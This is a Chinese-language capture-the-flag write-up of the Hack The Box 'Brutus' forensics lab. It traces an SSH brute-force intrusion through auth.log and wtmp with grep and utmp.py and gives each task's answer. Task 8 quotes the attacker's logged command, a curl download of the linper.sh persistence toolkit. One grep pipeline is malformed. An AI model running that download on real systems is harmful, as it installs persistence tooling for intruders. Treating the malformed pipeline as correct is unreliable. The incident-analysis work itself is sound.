🛡️VeryEasy_Brutus

# 🛡️HTB_VeryEasy_Brutus ### 🔎Task1：分析auth.log，攻擊者使用哪個IP位址進行暴力破解？ ![VeryEasy_Brutus_Task1](https://hackmd.io/_uploads/Byg2BBCfZx.png) 先將下載的 Brutus 檔案進行解壓,得到3個檔案，接著以 **grep** 指令用關鍵字 **"Failed password"** 篩選搜索 auth.log 檔案，可以看到同一IP在短時間內嘗試登入並使用了不同的使用者，即可推測攻擊者使用的IP為 `65.2.161.68` > ``` > 7z e Brutus.zip > grep "Failed password" auth.log > ``` > ![VeryEasy_Brutus_Task1_Process1](https://hackmd.io/_uploads/r1fawSCGWe.png) > ![VeryEasy_Brutus_Task1_Process2](https://hackmd.io/_uploads/ryApPBAGWx.png) ### 🔎Task2：暴力破解成功，攻擊者獲得了伺服器上一個帳戶的存取權限。該帳戶的使用者名稱是什麼？ ![VeryEasy_Brutus_Task2](https://hackmd.io/_uploads/ry8RDrCfZg.png) 同樣以 **grep** 指令用攻擊者IP及 **"Accepted pawword"** 為關鍵字篩選搜索 auth.log 檔案，可以看見攻擊者成功登入所使用的使用者名稱為 `root` > ``` > grep "65.2.161.68" auth.log | "Accepted password" > ``` > ![VeryEasy_Brutus_Task2_Process1](https://hackmd.io/_uploads/SyR0wBCGZx.png) ### 🔎Task3：識別攻擊者手動登入伺服器並建立終端會話以執行其目標時的UTC時間戳。登入時間與身份驗證時間不同，可以在wtmp檔案中找到。 ![VeryEasy_Brutus_Task3](https://hackmd.io/_uploads/BJry_SAzZe.png) 以 **grep** 指令用伺服器端 **sshd** ,攻擊者IP及 **"Accepted pawword"** 為關鍵字篩選搜索 auth.log 檔案，可以發現第一次成功登入及登出的時間戳相差不到一秒，推測第二次為手動登入的登入時間，接著以 **last** 指令打開 wtmp 檔案，如果開啟失敗，且發現 wtmp 是一個 data 檔，須執行 utmp.py 檔案取得 wtmp 檔案，並設定時間戳為 UTF，再以 **grep** 指令用攻擊者IP為關鍵字來篩選，可發現攻擊者所使用的使用者名稱root正式登入的時間戳為 `2024-03-06 06:32:45` > ``` > grep "sshd" auth.log | grep "65.2.161.68" | grep -A3 "Accepted password" > last -f wtmp > file wtmp > TZ=utc python3 utmp.py wtmp | grep "65.2.161.68" > ``` > ![VeryEasy_Brutus_Task3_Process1](https://hackmd.io/_uploads/S1kbuBRfZl.png) > ![VeryEasy_Brutus_Task3_Process2](https://hackmd.io/_uploads/BkvWuH0G-e.png) > ![VeryEasy_Brutus_Task3_Process3](https://hackmd.io/_uploads/S1ZGOBAfbx.png) ### 🔎Task4：SSH登入會話會被追蹤並在登入時分配一個會話編號。對於第2題中的使用者帳戶，攻擊者的會話被分配了哪一個會話編號？ ![VeryEasy_Brutus_Task4](https://hackmd.io/_uploads/Bk9MOSAMZe.png) 以 **grep** 指令，用系統登入服務 **systemd-logind** 為關鍵字來篩選登入狀態的會話服務，對照Task3所得的時間可以知道會話編號為 `37` > ``` > grep "sshd" auth.log | grep "65.2.161.68" | grep -A3 "Accepted password" > grep "systemd-logind" auth.log > ``` > ![VeryEasy_Brutus_Task4_Process1](https://hackmd.io/_uploads/r1Sm_H0fWl.png) ### 🔎Task5：攻擊者在伺服器上新增了一個新使用者作為其持久化策略的一部分，並賦予此新使用者帳戶更高的權限。這個帳戶的名稱是什麼？ ![VeryEasy_Brutus_Task5](https://hackmd.io/_uploads/S1KHdB0MZl.png) 以 **grep** 指令用攻擊者IP及 **Accepted password** 為關鍵字來篩選來自攻擊者IP的登入操作，可以發現攻擊者IP有第二個使用者登入，再以此使用者名字用 **grep** 篩選，從時間戳可以推測攻擊者在使用使用者root期間，新增的新使用者並賦予最高權限的為 `cyberjunkie` > ``` > grep "65.2.161.68" auth.log | grep "Accepted password" > grep "cyberjunkie" auth.log > ``` > ![VeryEasy_Brutus_Task5_Process1](https://hackmd.io/_uploads/rkW8OHCGZe.png) ### 🔎Task6：透過建立新帳戶用於持久化的MITRE ATT&CK子技術ID是什麼？ ![VeryEasy_Brutus_Task6](https://hackmd.io/_uploads/Hk5wuHRGWg.png) * 主技術（Technique）：T1136 — Create Account（建立帳戶） * 子技術（Sub-techniques）： 1. T1136.001 — Local Account（本機帳號） 1. T1136.002 — Domain Account（網域帳號） 1. T1136.003 — Cloud Account（雲端帳號） ### 🔎Task7：根據auth.log，攻擊者的第一次SSH會話在什麼時間結束？ ![VeryEasy_Brutus_Task7](https://hackmd.io/_uploads/r10LOSCfZl.png) 同樣以 **grep** 指令，用系統登入服務 **systemd-logind** 為關鍵字來篩選登入狀態的會話服務，可以看到在`2024-03-06 06:37:24`的時候登出，以結束會話。 > ``` > grep "systemd-logind" auth.log > ``` > ![VeryEasy_Brutus_Task7_Process1](https://hackmd.io/_uploads/SkruOS0M-e.png) ### 🔎Task8：攻擊者登入了他們的後門帳戶，並利用其更高的權限下載了腳本。使用 sudo 執行的完整命令是什麼？ ![VeryEasy_Brutus_Task8](https://hackmd.io/_uploads/HypdOHCzbx.png) 以 **grep** 指令用攻擊者新建的使用者名稱 **cyberjunkie** 為關鍵字來篩選在 auth.log 檔案中相關的動作，可以看見這個帳戶在COMMAND中所執行的完整命令為 `/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh ` > ``` > grep "cyberjunkie" auth.log > ``` > ![VeryEasy_Brutus_Task8_Process1](https://hackmd.io/_uploads/r1XtOS0z-g.png)